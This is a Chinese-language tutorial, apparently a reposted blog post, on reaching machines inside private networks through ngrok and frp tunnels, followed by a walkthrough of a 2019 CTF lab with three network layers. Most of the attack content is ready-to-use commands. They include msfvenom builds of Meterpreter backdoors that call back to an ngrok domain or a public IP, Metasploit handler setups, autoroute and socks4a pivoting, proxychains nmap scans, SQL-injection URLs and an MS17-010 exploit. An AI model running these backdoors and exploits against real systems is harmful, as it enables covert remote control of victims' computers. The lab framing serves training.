
代理技術和隧道技術都屬于內網穿透,代理主要解決內網里面通信的問題(比如對方在內網,你也在內網,這時候兩個內網實作通信就必須要經過代理才能實作,常見工具有frp、ngrok和ew等,ew(earthworm已經停止更新了,就不演示)),和一些防火墻的攔截
隧道主要是一些安全設備和流量監控設備上的攔截問題
代理主要解決的是三種問題:內網主機有外網,內網有過濾有一些防火墻問題、內網里面無外網

必要基礎知識點:
1.內外網簡單知識
內網ip地址是私有ip地址(10/8, 172.16/12 , 192.168/16),除此之外就是公有ip
2.內網1和內網2通信問題
1主機在內網1,2主機在內網2.就好比說你在學校宿舍上網,我在網吧上網,我們都屬于內網,但是我們不是一個內網,您是學校內網,我是網吧內網,這兩個網路如果要實作通信,比如我現在有個后門CS或者MSF生成一個后門發給你,你去執行這個后門,這個時候如果你能讓對方上線到你這是上線不了的,因為你們都是內網,除非這個時候采用一些代理技術,你用CS想控制這臺內網主機,你CS在另外一個內網,受害主機在一個內網,那么上線是不可能的,必須要借助代理
3.正反向協議通信連接問題
正向代理就是正方向的連接,反向代理就是反方向的連接
什么是正方向,什么是反方向呢?
如果是控制端去連接被控制端的話,就屬于正向代理,
被控制端去連接控制端就是反向代理,這個正向代理和反向代理為什么要區分開呢?
你的控制端如果是服務器,是外網一臺主機,就是公網的一臺服務器,就相當于你在外網有一個唯一的IP地址,通過這個IP地址你能夠找到你;
被控制的肉雞是內網,如果你去主動找這臺被控的內網主機你是找不到的,
4.內網穿透代理隧道技術說明
隧道主要解決流量分析工具和流量監控工具 還有想防火墻過濾問題
代理主要解決網路的連通性問題

黑客在湖南局域網,肉雞在上海局域網,你用的是自己內網里面的虛擬機kali生成的后門,你想實作控制上海的肉雞,
理論上,如果你不涉及到代理,是絕對控制不了的,因為你兩者都是內網,你生成后門的時候,你如果寫你外網的木馬地址的話,它去連接的時候找到的是你的路由器,你寫你內網地址的話,那就更加找不到,它就不可能實作控制,
這時候就要借助ngrok這款工具來實作連通,它是怎么實作呢?下面簡單把原理分析一下
用到ngrok這款工具的時候,ngrok會在外網啟動一臺服務器給你,相當于這臺肉雞想去找你的時候先去找這個服務器,服務器再傳輸給你,同樣,如果你要找這臺肉雞,也要經過這臺服務器,其實就是說,這款工具就是在中間架設一臺外網服務器,因為這臺外網服務器你和他都能訪問,你找對面肉雞的時候會經過外網服務器,這個資料要回連給控制端的時候也會找這臺外網服務器,服務器會在控制端這里有個客戶端,就相當于接收服務器給的資料,你出去,客戶端給服務器;資料連通就是正常的!其實就是找了一個中介!
演示案例:
? 內網穿透Ngrok測驗演示-兩個內網通訊上線
? 內網穿透Frp自建跳板測驗-兩個內網通訊上線
? CFS三層內網漫游安全測驗演練-某CTF線下2019
案例1-內網穿透Ngrok測驗演示-兩個內網通訊上線
實驗環境:兩個不同的內網(有網路)實作穿透控制
1.注冊-購買-填寫-確認http://www.ngrok.cc/(國內)
協議:http 本地埠:192.168.76.132:4444



kali就下載linux的客戶端


開通后點擊隧道管理

開兩臺虛擬機來模擬:用msf生成后門,再用一臺電腦來執行這個后門,兩臺電腦實作這個問題
打開kali:
寫這個隧道id就會找到那個外網上去

確保是online,如果不是online就說明隧道有問題
http://xiaodisec.free.idcfengye.com ——》192.168.76.132:4444(對方訪問這個網址就會指向這個ip)
192.168.76.132:4444就是本機kali的ip地址
2.測驗:內網1執行后門-免費主機處理-內網2監聽-內網2接受器
在卡里下生成后門:
msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o test.exe(生成后門,因為選擇的是http協議,所以這里是reverse_http)生成一個后門,系結xiaodisec.free.idcfengye.com地址和 80埠
這時候把生成的后門檔案test.exe復制到windows7
下面配置后門監聽狀態(配置并監聽)一旦xiaodisec.free.idcfengye.com有流量,就發生給本地
msfconsole
use exploit/multi/handler # 選擇監聽模塊
set payload windows/meterpreter/reverse_http(和生成木馬的payload一致)配置引數
set lhost 192.168.76.132
set lport 4444

這時候windows7去執行后門檔案:

./sunny clientid aa0676878c162ffc
msfvenom -p windows/meterpreter/reverse_http lhost=xiaodisec.free.idcfengye.com lport=80 -f exe -o test.exe(生成后門)
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.76.132
set lport 4444
exploit
案例2-內網穿透Frp自建跳板測驗-兩個內網通訊上線
自行搭建,方便修改,成本低,使用多樣化,適合高富帥及隱私哥哥們
1.服務端-下載-解壓-修改-啟動(阿里云主機記得修改安全組配置出入口)用xshell連接云服務器更改frps.ini
服務器修改組態檔frps.ini:
[common]
bind_port = 6677
啟動服務端:
./frps -c ./frps.ini

2.控制端-下載-解壓-修改-啟動
控制端修改組態檔frpc.ini:
[common]
server_addr = 你的云主機ip
server_port = 6677 #frpc作業埠,必須和上面frps保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 #轉發給本機的5555
remote_port = 6000 #服務端用6000埠轉發給本機

啟動客戶端(kali):
./frpc -c ./frpc.ini
生成后門:
msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.160.211(你的公網ip) lport=6000 -f exe -o frp.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit
監聽后把木馬放到windows7上面執行
3.靶機運行frp即可
案例3-CFS三層內網漫游安全測驗演練-某CTF線下2019
參考:CFS靶機實戰演練-從外網殺進三層內網,橫向滲透拿到Flag
環境:

來源2019某CTF線下賽真題內網結合WEB攻防題庫,涉及WEB攻擊,內網代理路由等技術,每臺服務器存在一個Flag,獲取每一個Flag對應一個積分,獲取三個Flag結尾,
Target1(centos7 x64):
探針目標-利用WEB漏洞(TP5_RCE)-獲取webshell權限-蟻劍連接--獲取Flag-Target2

1.生成linux后門:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.76.132(kali的ip) LPORT=1111 -f elf >t1.elf
2.接受反彈:
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.76.132
set LPORT 1111
exploit
將t1.elf通過webshell上傳上去

執行完成后,kali主機上劫持到會話,會話已經彈到kali上面,kali是76網段,怎么讓kali訪問到22網段?
msf上面有自帶的代理加持,在CS上面也有,先通過網路介面來判斷
3.資訊收集及配置訪問
獲取網路介面:run get_local_subnets(因為在實戰情況下是不知道這臺主機是什么網路的,前面是因為看了拓撲圖,這個就是獲取網卡資訊,確保下面有沒有內網)

查看路由地址:run autoroute -p(查看當前路由)

添加路由地址:run autoroute -s 192.168.22.0/24

添加路由后,我和22這個網卡是能通訊,但是你通訊怎么攻擊它呢?還是要使用工具,但是這個路由有個問題,只能在msf上通信,只能在msf會話上操作,msf有很多命令去探測,但是不能攻擊,這是就要本地開個代理,相當于給其他人一個介面,
相當于在這臺target1或者kali上面開個介面,讓外部人連接這個介面,因為目前kali已經可以訪問目標2,因為已經有路由了,所以可以在上面開個介面,那么我可以通過本機訪問kali的2222埠
開啟本地代理:
use auxiliary/server/socks4a
set srvport 2222
exploit
等一下連接2222就能和kali進行連接,
4.利用本地代理介面訪問測驗
設定瀏覽器代理進行訪問測驗
linux:
配置proxychains(代理工具)后呼叫工具探針Target2
/etc/proxychains.conf
socks4 192.168.76.132 2222(在組態檔中添加)
proxychains4 nmap -sT -Pn 192.168.22.0/24 -p80 (這樣nmap就會掃描22網段)
-Pn:掃描主機檢測其是否受到資料包過濾軟體或防火墻的保護,
-sT:掃描TCP資料包已建立的連接connect
windows:
利用代理工具Proxifier或SocksCap64載入代理進行行程訪問測驗
Target2(ubuntu x64):
探針目標-利用WEB漏洞(SQL注入)-后臺獲取webshell權限-獲取Flag-Target3
http://192.168.22.128/index.php?r=vul&keyword=1 #sql注入
http://192.168.22.128/index.php?r=admini/public/login #后臺
http://192.168.22.128/index.php?r=special #后門shell
1.生成正向后門:
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=3333 -f elf > t2.elf
2.訪問接受:
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.22.128
set LPORT 3333
exploit
3.資訊收集及配置訪問
獲取網路介面:run get_local_subnets
查看路由地址:run autoroute -p
添加路由地址:run autoroute -s 192.168.33.0/24
Target3:(windows7 x64)
探針目標-埠及漏洞掃描-利用MS17010獲取系統權限-獲取Flag-GG
proxychains4 nmap -Pn -sT 192.168.33.33
use exploit/windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.33.33
exploit
shell
dir /S flag.txt /B
type xxxxx.txt
涉及資源:
http://www.ngrok.cc/
https://gofrp.org/docs/
Releases · fatedier/frp · GitHub
https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw提取碼: xiao
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/302177.html
標籤:其他

